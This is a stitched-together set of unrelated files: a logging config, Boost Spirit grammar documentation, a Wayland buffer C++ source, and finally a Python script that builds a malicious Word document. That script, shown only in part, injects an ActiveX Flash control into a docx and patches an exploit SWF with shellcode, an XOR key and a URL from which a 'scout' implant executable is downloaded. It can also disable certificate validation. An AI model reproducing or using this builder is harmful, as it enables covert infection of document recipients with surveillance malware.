{
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'agent': {
'()': 'volttron.platform.agent.utils.AgentFormatter',
},
},
'handlers': {
'rotating': {
'class': 'logging.handlers.TimedRotatingFileHandler',
'level': 'INFO',
'formatter': 'agent',
'filename': 'volttron.log',
'encoding': 'utf-8',
'when': 'midnight',
'backupCount': 7,
},
},
'root': {
'handlers': ['rotating'],
'level': 'INFO',
},
}
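A minimal sketch of applying a dictConfig-style mapping like the one above in plain Python (the file name is hypothetical, and resolving the '()' formatter factory requires the volttron package to be importable):

    import ast
    import logging
    import logging.config

    # The config is a Python literal (single quotes, trailing commas), not JSON,
    # so parse it with ast.literal_eval rather than json.load.
    with open("log_config.py") as f:
        config = ast.literal_eval(f.read())

    logging.config.dictConfig(config)
    logging.getLogger(__name__).info("logging configured")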
<html>
<head>
<title>The Grammar</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="theme/style.css" type="text/css">
</head>
<body>
<table width="100%" border="0" background="theme/bkd2.gif" cellspacing="2">
<tr>
<td width="10">
</td>
<td width="85%">
<font size="6" face="Verdana, Arial, Helvetica, sans-serif"><b>The Grammar</b></font>
</td>
<td width="112"><a href="http://spirit.sf.net"><img src="theme/spirit.gif" width="112" height="48" align="right" border="0"></a></td>
</tr>
</table>
<br>
<table border="0">
<tr>
<td width="10"></td>
<td width="30"><a href="../index.html"><img src="theme/u_arr.gif" border="0"></a></td>
<td width="30"><a href="scanner.html"><img src="theme/l_arr.gif" border="0"></a></td>
<td width="30"><a href="subrules.html"><img src="theme/r_arr.gif" border="0"></a></td>
</tr>
</table>
<p>The <b>grammar</b> encapsulates a set of rules. The <tt>grammar</tt> class
is a protocol base class. It is essentially an interface contract. The <tt>grammar</tt>
is a template class that is parameterized by its derived class, <tt>DerivedT</tt>,
and its context, <tt>ContextT</tt>. The template parameter ContextT defaults
to <tt>parser_context</tt>, a predefined context. </p>
<p>You need not be concerned at all with the ContextT template parameter unless
you wish to tweak the low level behavior of the grammar. Detailed information
on the ContextT template parameter is provided <a href="indepth_the_parser_context.html">elsewhere</a>.
The <tt>grammar</tt> relies on the template parameter DerivedT, a grammar subclass
to define the actual rules.</p>
<p>Presented below is the public API. There may actually be more template parameters
after <tt>ContextT</tt>. Everything after the <tt>ContextT</tt> parameter should
not be of concern to the client and is strictly for internal use only.</p>
<pre><code><font color="#000000"><span class=identifier> </span><span class=keyword>template</span><span class=special><
</span><span class=keyword>typename </span><span class=identifier>DerivedT</span><span class=special>,
</span><span class=keyword>typename </span><span class=identifier>ContextT </span><span class=special>= </span><span class=identifier>parser_context</span><span class=special><</span><span class=special>> >
</span><span class=keyword>struct </span><span class=identifier>grammar</span><span class=special>;</span></font></code></pre>
<h2>Grammar definition</h2>
<p>A concrete sub-class inheriting from <tt>grammar</tt> is expected to have a
nested template class (or struct) named <tt>definition</tt>:</p>
<blockquote>
<p><img src="theme/bullet.gif" width="13" height="13"> It is a nested template
class with a typename <tt>ScannerT</tt> parameter.<br>
<img src="theme/bullet.gif" width="13" height="13"> Its constructor defines
the grammar rules.<br>
<img src="theme/bullet.gif" width="13" height="13"> Its constructor is passed
in a reference to the actual grammar <tt>self</tt>.<br>
<img src="theme/bullet.gif" width="13" height="13"> It has a member function
named <tt>start</tt> that returns a reference to the start <tt>rule</tt>.</p>
</blockquote>
<h2>Grammar skeleton</h2>
<pre><code><font color="#000000"><span class=special> </span><span class=keyword>struct </span><span class=identifier>my_grammar </span><span class=special>: </span><span class=keyword>public </span><span class=identifier>grammar</span><span class=special><</span><span class=identifier>my_grammar</span><span class=special>>
</span><span class=special>{
</span><span class=keyword>template </span><span class=special><</span><span class=keyword>typename </span><span class=identifier>ScannerT</span><span class=special>>
</span><span class=keyword>struct </span><span class=identifier>definition
</span><span class=special>{
</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=identifier>r</span><span class=special>;
</span><span class=identifier>definition</span><span class=special>(</span><span class=identifier>my_grammar </span><span class=keyword>const</span><span class=special>& </span><span class=identifier>self</span><span class=special>) </span><span class=special>{ </span><span class=identifier>r </span><span class=special>= </span><span class=comment>/*..define here..*/</span><span class=special>; </span><span class=special>}
</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=keyword>const</span><span class=special>& </span><span class=identifier>start</span><span class=special>() </span><span class=keyword>const </span><span class=special>{ </span><span class=keyword>return </span><span class=identifier>r</span><span class=special>; </span><span class=special>}
</span><span class=special>};
</span><span class=special>};</span></font></code></pre>
<p>Decoupling the scanner type from the rules that form a grammar allows the grammar
to be used in different contexts possibly using different scanners. We do not
care what scanner we are dealing with. The user-defined <tt>my_grammar</tt>
can be used with <b>any</b> type of scanner. Unlike the rule, the grammar is
not tied to a specific scanner type. See <a href="faq.html#scanner_business">"Scanner
Business"</a> to see why this is important and to gain further understanding
on this scanner-rule coupling problem.</p>
<h2>Instantiating and using my_grammar</h2>
<p>Our grammar above may be instantiated and put into action:</p>
<pre><code><font color="#000000"><span class=special> </span><span class=identifier>my_grammar </span><span class=identifier>g</span><span class=special>;
</span><span class=keyword>if </span><span class=special>(</span><span class=identifier>parse</span><span class=special>(</span><span class=identifier>first</span><span class=special>, </span><span class=identifier>last</span><span class=special>, </span><span class=identifier>g</span><span class=special>, </span><span class=identifier>space_p</span><span class=special>).</span><span class=identifier>full</span><span class=special>)
</span><span class=identifier>cout </span><span class=special><< </span><span class=string>"parsing succeeded\n"</span><span class=special>;
</span><span class=keyword>else
</span><span class=identifier>cout </span><span class=special><< </span><span class=string>"parsing failed\n"</span><span class=special>;</span></font></code></pre>
<p><tt>my_grammar</tt> <b>IS-A </b>parser and can be used anywhere a parser is
expected, even referenced by another rule:</p>
<pre><code><font color="#000000"><span class=special> </span><span class=identifier>rule</span><span class=special><> </span><span class=identifier>r </span><span class=special>= </span><span class=identifier>g </span><span class=special>>> </span><span class=identifier>str_p</span><span class=special>(</span><span class=string>"cool huh?"</span><span class=special>);</span></font></code></pre>
<table width="80%" border="0" align="center">
<tr>
<td class="note_box"><img src="theme/alert.gif" width="16" height="16"> <b>Referencing
grammars<br>
</b><br>
Like the rule, the grammar is also held by reference when it is placed in
the right hand side of an EBNF expression. It is the responsibility of the
client to ensure that the referenced grammar stays in scope and does not
get destructed while it is being referenced. </td>
</tr>
</table>
<h2><a name="full_grammar"></a>Full Grammar Example</h2>
<p>Recalling our original calculator example, here it is now rewritten using a
grammar:</p>
<pre><code><font color="#000000"><span class=special> </span><span class=keyword>struct </span><span class=identifier>calculator </span><span class=special>: </span><span class=keyword>public </span><span class=identifier>grammar</span><span class=special><</span><span class=identifier>calculator</span><span class=special>>
</span><span class=special>{
</span><span class=keyword>template </span><span class=special><</span><span class=keyword>typename </span><span class=identifier>ScannerT</span><span class=special>>
</span><span class=keyword>struct </span><span class=identifier>definition
</span><span class=special>{
</span><span class=identifier>definition</span><span class=special>(</span><span class=identifier>calculator </span><span class=keyword>const</span><span class=special>& </span><span class=identifier>self</span><span class=special>)
</span><span class=special>{
</span><span class=identifier>group </span><span class=special>= </span><span class=literal>'(' </span><span class=special>>> </span><span class=identifier>expression </span><span class=special>>> </span><span class=literal>')'</span><span class=special>;
</span><span class=identifier>factor </span><span class=special>= </span><span class=identifier>integer </span><span class=special>| </span><span class=identifier>group</span><span class=special>;
</span><span class=identifier>term </span><span class=special>= </span><span class=identifier>factor </span><span class=special>>> </span><span class=special>*((</span><span class=literal>'*' </span><span class=special>>> </span><span class=identifier>factor</span><span class=special>) </span><span class=special>| </span><span class=special>(</span><span class=literal>'/' </span><span class=special>>> </span><span class=identifier>factor</span><span class=special>));
</span><span class=identifier>expression </span><span class=special>= </span><span class=identifier>term </span><span class=special>>> </span><span class=special>*((</span><span class=literal>'+' </span><span class=special>>> </span><span class=identifier>term</span><span class=special>) </span><span class=special>| </span><span class=special>(</span><span class=literal>'-' </span><span class=special>>> </span><span class=identifier>term</span><span class=special>));
</span><span class=special>}
</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=identifier>expression</span><span class=special>, </span><span class=identifier>term</span><span class=special>, </span><span class=identifier>factor</span><span class=special>, </span><span class=identifier>group</span><span class=special>;
</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=keyword>const</span><span class=special>&
</span><span class=identifier>start</span><span class=special>() </span><span class=keyword>const </span><span class=special>{ </span><span class=keyword>return </span><span class=identifier>expression</span><span class=special>; </span><span class=special>}
</span><span class=special>};
</span><span class=special>};</span></font></code></pre>
<p><img src="theme/lens.gif" width="15" height="16"> A fully working example with
<a href="semantic_actions.html">semantic actions</a> can be <a href="../example/fundamental/calc_plain.cpp">viewed
here</a>. This is part of the Spirit distribution. </p>
<table width="80%" border="0" align="center">
<tr>
<td class="note_box"><img src="theme/lens.gif" width="15" height="16"> <b>self</b><br>
<br>
You might notice that the definition of the grammar has a constructor that
accepts a const reference to the outer grammar. In the example above, notice
that <tt>calculator::definition</tt> takes in a <tt>calculator const&
self</tt>. While this is unused in the example above, in many cases, this
is very useful. The self argument is the definition's window to the outside
world. For example, the calculator class might have a reference to some
state information that the definition can update while parsing proceeds
through <a href="semantic_actions.html">semantic actions</a>. </td>
</tr>
</table>
<h2>Grammar Capsules</h2>
<p>As a grammar becomes complicated, it is a good idea to group parts into logical
modules. For instance, when writing a language, it might be wise to put expressions
and statements into separate grammar capsules. The grammar takes advantage of
the encapsulation properties of C++ classes. The declarative nature of classes
makes it a perfect fit for the definition of grammars. Since the grammar is
nothing more than a class declaration, we can conveniently publish it in header
files. The idea is that once written and fully tested, a grammar can be reused
in many contexts. We now have the notion of grammar libraries.</p>
<h2><a name="multithreading"></a>Reentrancy and multithreading</h2>
<p>An instance of a grammar may be used in different places multiple times without
any problem. The implementation is tuned to allow this at the expense of some
overhead. However, we can save considerable cycles and bytes if we are certain
that a grammar will only have a single instance. If this is desired, simply
define <tt>BOOST_SPIRIT_SINGLE_GRAMMAR_INSTANCE</tt> before including any spirit
header files.</p>
<pre><font face="Courier New, Courier, mono"><code><span class="preprocessor"> #define</span></code></font><span class="preprocessor"><code><font face="Courier New, Courier, mono"> </font><tt>BOOST_SPIRIT_SINGLE_GRAMMAR_INSTANCE</tt></code></span></pre>
<p> On the other hand, if a grammar is intended to be used in multithreaded code,
we should then define <tt>BOOST_SPIRIT_THREADSAFE</tt> before including any
spirit header files. In this case it will also be required to link against <a href="http://www.boost.org/libs/thread/doc/index.html">Boost.Threads</a></p>
<pre><font face="Courier New, Courier, mono"><span class="preprocessor"> #define</span></font> <span class="preprocessor"><tt>BOOST_SPIRIT_THREADSAFE</tt></span></pre>
<h2>Using more than one grammar start rule </h2>
<p>Sometimes it is desirable to have more than one visible entry point to a grammar
(apart from the start rule). To allow additional start points, Spirit provides
a helper template <tt>grammar_def</tt>, which may be used as a base class for
the <tt>definition</tt> subclass of your <tt>grammar</tt>. Here's an example:</p>
<pre><code> <span class="comment">// this header has to be explicitly included</span>
<span class="preprocessor">#include</span> <span class="string"><boost/spirit/utility/grammar_def.hpp></span>
</span><span class=keyword>struct </span><span class=identifier>calculator2 </span><span class=special>: </span><span class=keyword>public </span><span class=identifier>grammar</span><span class=special><</span><span class=identifier>calculator2</span><span class=special>>
{
</span> <span class="keyword">enum</span>
{
expression = 0,
term = 1,
factor = 2,
};
<span class=special> </span><span class=keyword>template </span><span class=special><</span><span class=keyword>typename </span><span class=identifier>ScannerT</span><span class=special>>
</span><span class=keyword>struct </span><span class=identifier>definition
</span><span class="special">:</span> <span class="keyword">public</span><span class=identifier> grammar_def</span><span class="special"><</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>>,</span> same<span class="special">,</span> same<span class="special">></span>
<span class=special>{</span>
<span class=identifier>definition</span><span class=special>(</span><span class=identifier>calculator2 </span><span class=keyword>const</span><span class=special>& </span><span class=identifier>self</span><span class=special>)
{
</span><span class=identifier>group </span><span class=special>= </span><span class=literal>'(' </span><span class=special>>> </span><span class=identifier>expression </span><span class=special>>> </span><span class=literal>')'</span><span class=special>;
</span><span class=identifier>factor </span><span class=special>= </span><span class=identifier>integer </span><span class=special>| </span><span class=identifier>group</span><span class=special>;
</span><span class=identifier>term </span><span class=special>= </span><span class=identifier>factor </span><span class=special>>> *((</span><span class=literal>'*' </span><span class=special>>> </span><span class=identifier>factor</span><span class=special>) | (</span><span class=literal>'/' </span><span class=special>>> </span><span class=identifier>factor</span><span class=special>));
</span><span class=identifier>expression </span><span class=special>= </span><span class=identifier>term </span><span class=special>>> *((</span><span class=literal>'+' </span><span class=special>>> </span><span class=identifier>term</span><span class=special>) | (</span><span class=literal>'-' </span><span class=special>>> </span><span class=identifier>term</span><span class=special>));</span>
<span class="keyword">this</span><span class="special">-></span>start_parsers<span class="special">(</span>expression<span class="special">,</span> term<span class="special">,</span> factor<span class="special">);</span>
<span class="special">}</span>
<span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=identifier>expression</span><span class=special>, </span><span class=identifier>term</span><span class=special>, </span><span class=identifier>factor, group</span><span class=special>;
</span><span class=special> };
};</span></font></code></pre>
<p>The <tt>grammar_def</tt> template has to be instantiated with the types of
all the rules you wish to make visible from outside the <tt>grammar</tt>:</p>
<pre><code><span class=identifier> </span><span class=identifier>grammar_def</span><span class="special"><</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>>,</span> same<span class="special">,</span> same<span class="special">></span></code> </pre>
<p>The shorthand notation <tt>same</tt> is used to indicate that the same type
be used as specified by the previous template parameter (e.g. <code><tt>rule<ScannerT></tt></code>).
Obviously, <tt>same</tt> may not be used as the first template parameter. </p>
<table width="80%" border="0" align="center">
<tr>
<td class="note_box"> <img src="theme/bulb.gif" width="13" height="18"> <strong>grammar_def
start types</strong><br>
<br>
It may not be obvious, but it is interesting to note that aside from rule<>s,
any parser type may be specified (e.g. chlit<>, strlit<>, int_parser<>,
etc.).</td>
</tr>
</table>
<p>Using the grammar_def class, there is no need to provide a <tt>start()</tt> member
function anymore. Instead, you'll have to insert a call to the <tt>this->start_parsers()</tt>
(which is a member function of the <tt>grammar_def</tt> template) to define
the start symbols for your <tt>grammar</tt>. <img src="theme/note.gif" width="16" height="16">
Note that the number and the sequence of the rules used as the parameters to
the <tt>start_parsers()</tt> function should match the types specified in the
<tt>grammar_def</tt> template:</p>
<pre><code> <span class="keyword">this</span><span class="special">-></span>start_parsers<span class="special">(</span>expression<span class="special">,</span> term<span class="special">,</span> factor<span class="special">);</span></code></pre>
<p> The grammar entry point may be specified using the following syntax:</p>
<pre><code><font color="#000000"><span class=identifier> g</span><span class="special">.</span><span class=identifier>use_parser</span><span class="special"><</span><span class=identifier>N</span><span class=special>>() </span><span class="comment">// Where g is your grammar and N is the Nth entry.</span></font></code></pre>
<p>This sample shows how to use the <tt>term</tt> rule from the <tt>calculator2</tt>
grammar above:</p>
<pre><code><font color="#000000"><span class=identifier> calculator2 g</span><span class=special>;
</span><span class=keyword>if </span><span class=special>(</span><span class=identifier>parse</span><span class=special>(</span><span class=identifier>
first</span><span class=special>, </span><span class=identifier>last</span><span class=special>,
</span><span class=identifier>g</span><span class="special">.</span><span class=identifier>use_parser</span><span class="special"><</span><span class=identifier>calculator2::term</span><span class=special>>(),</span><span class=identifier>
space_p</span><span class=special>
).</span><span class=identifier>full</span><span class=special>)
{
</span><span class=identifier>cout </span><span class=special><< </span><span class=string>"parsing succeeded\n"</span><span class=special>;
}
</span><span class=keyword>else</span> <span class="special">{</span>
<span class=identifier>cout </span><span class=special><< </span><span class=string>"parsing failed\n"</span><span class=special>;
}</span></font></code></pre>
<p>The template parameter for the <tt>use_parser<></tt> template type should
be the zero based index into the list of rules specified in the <tt>start_parsers()</tt>
function call. </p>
<table width="80%" border="0" align="center">
<tr>
<td class="note_box"><img src="theme/note.gif" width="16" height="16"> <tt><strong>use_parser<0></strong></tt><br>
<br>
Note, that using <span class="literal">0</span> (zero) as the template parameter
to <tt>use_parser</tt> is equivalent to using the start rule, exported by
conventional means through the <tt>start()</tt> function, as shown in the
first <tt><a href="grammar.html#full_grammar">calculator</a></tt> sample
above. So this notation may be used even for grammars exporting one rule
through its <tt>start()</tt> function only. On the other hand, calling a
<tt>grammar</tt> without the <tt>use_parser</tt> notation will execute the
rule specified as the first parameter to the <tt>start_parsers()</tt> function.
</td>
</tr>
</table>
<p>The maximum number of usable start rules is limited by the preprocessor constant:</p>
<pre> <span class="identifier">BOOST_SPIRIT_GRAMMAR_STARTRULE_TYPE_LIMIT</span> <span class="comment">// defaults to 3</span></pre>
<table border="0">
<tr>
<td width="10"></td>
<td width="30"><a href="../index.html"><img src="theme/u_arr.gif" border="0"></a></td>
<td width="30"><a href="scanner.html"><img src="theme/l_arr.gif" border="0"></a></td>
<td width="30"><a href="subrules.html"><img src="theme/r_arr.gif" border="0"></a></td>
</tr>
</table>
<br>
<hr size="1">
<p class="copyright">Copyright © 1998-2003 Joel de Guzman<br>
Copyright © 2003-2004 Hartmut Kaiser <br>
<br>
<font size="2">Use, modification and distribution is subject to the Boost Software
License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt) </font> </p>
<p> </p>
</body>
</html>
// -------------------------------------------------------------------------
// Copyright (C) 2017 BMW Car IT GmbH
// -------------------------------------------------------------------------
// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at https://mozilla.org/MPL/2.0/.
// -------------------------------------------------------------------------
#include "EmbeddedCompositor_Wayland/WaylandBufferResource.h"
namespace ramses_internal
{
WaylandBufferResource::WaylandBufferResource()
{
}
WaylandBufferResource::WaylandBufferResource(wl_resource* resource, bool ownership)
: WaylandResource(resource, ownership)
{
}
void WaylandBufferResource::bufferSendRelease()
{
wl_buffer_send_release(m_resource);
}
int32_t WaylandBufferResource::bufferGetSharedMemoryWidth() const
{
wl_shm_buffer* sharedMemoryBuffer = wl_shm_buffer_get(m_resource);
if (sharedMemoryBuffer)
{
return wl_shm_buffer_get_width(sharedMemoryBuffer);
}
else
{
return 0;
}
}
int32_t WaylandBufferResource::bufferGetSharedMemoryHeight() const
{
wl_shm_buffer* sharedMemoryBuffer = wl_shm_buffer_get(m_resource);
if (sharedMemoryBuffer)
{
return wl_shm_buffer_get_height(sharedMemoryBuffer);
}
else
{
return 0;
}
}
const void* WaylandBufferResource::bufferGetSharedMemoryData() const
{
wl_shm_buffer* sharedMemoryBuffer = wl_shm_buffer_get(m_resource);
if (sharedMemoryBuffer)
{
return wl_shm_buffer_get_data(sharedMemoryBuffer);
}
else
{
return nullptr;
}
}
WaylandBufferResource* WaylandBufferResource::clone() const
{
return new WaylandBufferResource(m_resource, false);
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
import os
import sys
import copy
import json
import glob
import zlib
import random
import shutil
import pylzma
import struct
import argparse
import platform
import tempfile
import urlparse
import subprocess
import ConfigParser
from zipfile import ZipFile
# ------- start of utils subs -------
def random_id(length):
number = '0123456789'
alpha = 'abcdefghijklmnopqrstuvwxyz'
id = ''
for i in range(0, length, 2):
id += random.choice(number)
id += random.choice(alpha)
return id
def four_byte_xor(buf, key):
out = ''
for i in range(0, len(buf)/4):
c = struct.unpack('<I', buf[(i*4):(i*4)+4])[0]
c ^= key
out += struct.pack('<I', c)
reminder = len(buf) % 4
for i in range(len(buf) - reminder, len(buf)):
c = struct.unpack('B', buf[i])[0]
c ^= 0x41
out += struct.pack('B', c)
return out
def byteArray2String(param):
f, tmp = tempfile.mkstemp()
os.close(f)
f = open(tmp, 'wb')
f.write(param)
f.close()
f = open(tmp, 'rb')
result = f.read()
f.close()
try:
os.unlink(tmp)
except WindowsError:
print 'I/O error when deleting {} file'.format(tmp)
return result
# ------- end of utils subs -------
# ------- start of build subs -------
def create_doc(input_docx):
# unpack zip file
if not os.path.exists("tmp"):
os.mkdir("tmp")
myzip = ZipFile(input_docx)
myzip.extractall("tmp")
myzip.close()
# update content types
buff = open("tmp/[Content_Types].xml", 'r').read()
idx = buff.lower().find("<types")
idx2 = buff[idx:].lower().find(">") + 1
buff2 = buff[:idx+idx2]
if buff.lower().find("vnd.ms-office.activex") == -1:
buff2 += '<Default ContentType="application/vnd.ms-office.activeX" Extension="bin"/>'
if buff.lower().find("image/x-wmf") == -1:
buff2 += '<Default ContentType="image/x-wmf" Extension="wmf"/>'
buff2 += '<Override ContentType="application/vnd.ms-office.activeX+xml" PartName="/word/activeX/activeX1.xml"/>'
buff2 += buff[idx+idx2:]
open("tmp/[Content_Types].xml", 'w').write(buff2)
# update rels
buff = open("tmp/word/_rels/document.xml.rels", 'r').read()
idx = buff.lower().find("</relationships>")
buff2 = buff[:idx]
buff2 += '<Relationship Target="activeX/activeX1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Id="rId1000"/><Relationship Target="media/image1000.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId1001"/>'
buff2 += "</Relationships>"
open("tmp/word/_rels/document.xml.rels", 'w').write(buff2)
# update document
buff = open("tmp/word/document.xml", 'r').read()
#idx = buff.lower().find("</w:body")
#idx2 = 0
idx = buff.lower().find("<w:body")
idx2 = buff[idx:].lower().find(">") + 1
buff2 = buff[:idx+idx2]
buff2 += '<w:control w:name="ShockwaveFlash1" r:id="rId1000"/>'
buff2 += buff[idx+idx2:]
open("tmp/word/document.xml", 'w').write(buff2)
if os.path.exists("tmp/word/activeX"):
print "[!!] Unsupported file: contains an ActiveX"
sys.exit(-1);
if not os.path.exists("tmp/word/activeX/"):
shutil.copytree("resources/activeX/", "tmp/word/activeX/")
if not os.path.exists("tmp/word/media/"):
shutil.copytree("resources/media/", "tmp/word/media/")
else:
shutil.copy("resources/media/image1000.wmf", "tmp/word/media/")
'''
params:
- target_directory: exploit files destination folder
- ip: ip hosting exploit files
- scout_name: name of the scout as installed
- scout_input_path: path of the scout provided
- docx: path of the docx provided
- output: docx with the exploit link embedded
- swf_random_name: name of the swf hosted at ip
- exe_random_name: name of the exe(scout) hosted at ip
'''
def edn_build(target_directory, ip, basedir, scout_name, scout_input_path, docx, output_file, swf_random_name, exe_random_name, expiry, validate):
print '[*] Word Exploit:\n target directory: {}\n ip: {}\n basedir: {}\n scout name: {}\n\
scout input: {}\n docx: {}\n output: {}\n swf_random_name: {}\n exe_random_name: {}\n'.format(target_directory, ip, basedir, scout_name, scout_input_path, docx, output_file, swf_random_name, exe_random_name )
# clear tmp in case there're some leftovers
for root, dirs, files in os.walk('tmp'):
for f in files:
os.unlink(os.path.join(root, f))
for d in dirs:
shutil.rmtree(os.path.join(root, d))
# check whether we're regenerating or not
if os.path.exists(os.path.join(target_directory, '.config')):
print '[*] N.B. regenerating an existing exploit'
old_stuff = os.path.join(target_directory, 'instance_{}'.format(random_id(5)))
os.mkdir(old_stuff)
shutil.move(os.path.join(target_directory, 'data'), old_stuff)
for f in glob.glob(os.path.join(target_directory, '*.ini')):
shutil.move(f, old_stuff)
shutil.move(old_stuff, os.getcwd())
os.mkdir(os.path.join(target_directory, 'data'))
create_doc(docx)
# check whether we're regenerating this exploit, i.e. '.config' file exists within the exploit root dir
config_path = os.path.join(target_directory, '.config')
if os.path.exists(config_path):
data = json.load(open(config_path))
swf_url = str(data['url'])
swf_random_name = swf_url[swf_url.rfind('/')+1:]
parsed_url = urlparse.urlparse(swf_url)
ip = parsed_url.scheme + '://' + parsed_url.netloc
basdir = parsed_url.path[1:parsed_url.path.rfind('/')]
else:
#swf_url = ip + '/' + basedir + '/' + swf_random_name
swf_url = ip + basedir + swf_random_name
open(config_path, 'w').write('{{"url": "{}"}}'.format(swf_url))
#exe_url = ip + '/' + basedir + '/' + exe_random_name
exe_url = ip + basedir + exe_random_name
print '[*] exe_url: {}'.format(exe_url)
print '[*] swf_url: {}'.format(swf_url)
scout_name = scout_name
xor_key = random.randint(0xdead, 0xdeadbeef)
# offsets within resources/shellcode
xor_offt = 0x88 * 2
url_offt = xor_offt + (0x4*2)
scout_offt = 0x110 * 2
# offsets within resources/shellcode64
xor_offt64 = 0
url_offt64 = 8
scout_offt64 = 0x88 * 2
# decompress swf
compressed_swf = open("resources/exploit.swf", 'rb').read()
swf_buff = zlib.decompress(compressed_swf[8:])
# replace :)
swf_buff = swf_buff.replace("ht-201", "abc123")
swf_buff = swf_buff.replace("vector-exploit", "pector-isbrovi")
# --- start 32bit ---
stage2_offset = swf_buff.find(b"EFBEADDE")
if stage2_offset == 0:
print "[E] Gadget for shellcode not found"
sys.exit(-1)
print "[*] Gadget for shellcode found @ 0x%x" %(stage2_offset)
swf_bytearray = bytearray(swf_buff)
# replace shellcode 32
shellcode = open("resources/shellcode", 'rb').read()
if len(shellcode) > 5800:
print "[!!] Shellcode too big: 0x%x" % (len(shellcode))
sys.exit(-1)
hex_shellcode = shellcode.encode('hex')
# find mov var, 0xf001f001
# 0xf001f001 -> shellcode will validate CA
# !0xf001f001 -> shellcode will not validate CA
if not validate:
flag = 'c745fc01f001f0'
position = hex_shellcode.find(flag)
if position == -1:
print('[E] could not find validate cert flag')
exit(-1)
hex_shellcode = hex_shellcode.replace(flag, 'c745fceeeeeeee')
for i in range(len(hex_shellcode)):
swf_bytearray[stage2_offset + i] = hex_shellcode[i]
# modify URL 32
hex_url = exe_url.encode('hex') + "0000"
print "[*] Hex URL => %s" %(hex_url)
for i in range(len(hex_url)):
swf_bytearray[stage2_offset + url_offt + i] = hex_url[i]
# modify scout name 32
hex_scout = "5c" + scout_name.encode('hex') + "0000"
print "[*] Scout Name => %s" % (hex_scout)
for i in range(len(hex_scout)):
swf_bytearray[stage2_offset + scout_offt + i] = hex_scout[i]
# modify xor key
hex_xorkey = ("%08x" % xor_key)
print "[*] Hex key => %s" %(hex_xorkey)
swf_bytearray[stage2_offset + xor_offt + 0] = hex_xorkey[6]
swf_bytearray[stage2_offset + xor_offt + 1] = hex_xorkey[7]
swf_bytearray[stage2_offset + xor_offt + 2] = hex_xorkey[4]
swf_bytearray[stage2_offset + xor_offt + 3] = hex_xorkey[5]
swf_bytearray[stage2_offset + xor_offt + 4] = hex_xorkey[2]
swf_bytearray[stage2_offset + xor_offt + 5] = hex_xorkey[3]
swf_bytearray[stage2_offset + xor_offt + 6] = hex_xorkey[0]
swf_bytearray[stage2_offset + xor_offt + 7] = hex_xorkey[1]
# --- end 32bit ---
# --- start 64bit ---
# get offset to shellcode64
stage264_offset = swf_buff.find(b"CAF1ADDE")
if stage264_offset == 0:
print "[!!] Gadget for shellcode64 not found"
sys.exit(-1)
print "[*] Gadget for shellcode found @ 0x%x" %(stage264_offset)
# replace shellcode 64
shellcode64 = open("resources/shellcode64", 'rb').read()
if len(shellcode64) > (5800*2):
print "[!!] Shellcode too big: 0x%x" % (len(shellcode64))
sys.exit(-1)
hex_shellcode64 = shellcode64.encode('hex')
for i in range(len(hex_shellcode64)):
swf_bytearray[stage264_offset + i] = hex_shellcode64[i]
# modify URL 64
hex_url = exe_url.encode('hex') + "0000"
print "[*] Hex URL => %s" %(hex_url)
for i in range(len(hex_url)):
swf_bytearray[stage264_offset + url_offt64 + i] = hex_url[i]
# modify scout name 64
hex_scout = "5c" + scout_name.encode('hex') + "0000"
print "[*] Scout Name => %s" % (hex_scout)
for i in range(len(hex_scout)):
swf_bytearray[stage264_offset + scout_offt64 + i] = hex_scout[i]
# modify xor key 64
hex_xorkey = ("%08x" % xor_key)
print "[*] Hex key => %s" %(hex_xorkey)
swf_bytearray[stage264_offset + xor_offt64 + 0] = hex_xorkey[6]
swf_bytearray[stage264_offset + xor_offt64 + 1] = hex_xorkey[7]
swf_bytearray[stage264_offset + xor_offt64 + 2] = hex_xorkey[4]
swf_bytearray[stage264_offset + xor_offt64 + 3] = hex_xorkey[5]
swf_bytearray[stage264_offset + xor_offt64 + 4] = hex_xorkey[2]
swf_bytearray[stage264_offset + xor_offt64 + 5] = hex_xorkey[3]
swf_bytearray[stage264_offset + xor_offt64 + 6] = hex_xorkey[0]
swf_bytearray[stage264_offset + xor_offt64 + 7] = hex_xorkey[1]
# --- end 64bit ---
# compress swf
uncompressed_len = len(swf_bytearray)
uncompressed_len += len("ZWS\x0d")
uncompressed_len += 4 # + se stessa
print "[*] Uncompressed len: 0x%x" %(uncompressed_len)
lzma_buff = pylzma.compress(byteArray2String(swf_bytearray))
compressed_len = len(lzma_buff) - 5
print "[*] Compressed len: 0x%x" %(compressed_len)
output_buff = "ZWS\x0d"
output_buff += struct.pack("<L", uncompressed_len)
output_buff += struct.pack("<L", compressed_len)
output_buff += lzma_buff
# write swf to disk
open(swf_random_name, 'wb').write(output_buff)
shutil.move(swf_random_name, os.path.join(target_directory, 'data/not_really_empty.swf') )
# modify ole link
ole_link_buff = open("tmp/word/activeX/activeX1.bin", 'rb').read()
ole_link_offt = ole_link_buff.find("h\x00t\x00t\x00p")
print "[*] Offset to first link: 0x%x" %(ole_link_offt)
ole_link2_offt = ole_link_buff.find("h\x00t\x00t\x00p", ole_link_offt+1)
print "[*] Offset to second link: 0x%x" %(ole_link2_offt)
ole_link3_offt = ole_link_buff.find("h\x00t\x00t\x00p", ole_link2_offt+1)
print "[*] Offset to third link: 0x%x" %(ole_link3_offt)
# when the tls cert is not validated, swf is served over plain http
if not validate:
swf_url = swf_url.replace('https', 'http')
swf_url_bytearray = bytearray(swf_url + "\x00\x00")
ole_link_bytearray = bytearray(ole_link_buff)
for i in range(len(ole_link_bytearray)):
if i == ole_link_offt or i == ole_link2_offt or i == ole_link3_offt:
y = 0
